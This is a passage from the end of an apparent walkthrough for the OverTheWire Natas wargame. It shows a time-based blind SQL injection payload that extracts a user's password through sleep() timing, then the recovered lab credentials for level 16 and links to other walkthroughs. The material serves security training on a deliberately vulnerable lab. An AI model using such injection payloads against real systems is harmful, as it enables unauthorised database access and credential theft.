" UNION SELECT password, CASE WHEN password="WaIHEacj63wnNIBROHeqi3p9t0m5nhmh" THEN sleep(5) ELSE NULL END FROM users WHERE username="natas16" ; -- 
```

It works. Looks like we're in.



## Natas 16

```
Username: natas16
Password: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
URL:      http://natas16.natas.labs.overthewire.org
```






## Further Walkthroughs


There are some walkthroughs available online, although of limited quality or incomplete.


* [This](https://routley.io/posts/natas/) one goes all the way up to 20 of 24 but offers very little explanation of the through progress.
* [This](https://medium.com/@halis_bas/natas-wargame-walkthrough-0-12-3d8b0d480d54) one has very good explanations and goes up to 12. It is most recommended.
* [This](https://atalaysblog.wordpress.com/2019/05/12/natas-solutions/) one has ok explanations but goes up to 17


<!--stackedit_data:
eyJoaXN0b3J5IjpbMTg4Mjk0NTE1NCwtMTYwMTgwMTkwNiwyMD
UyNjc2Nzc2LDEwMTYzMzc3OThdfQ==
-->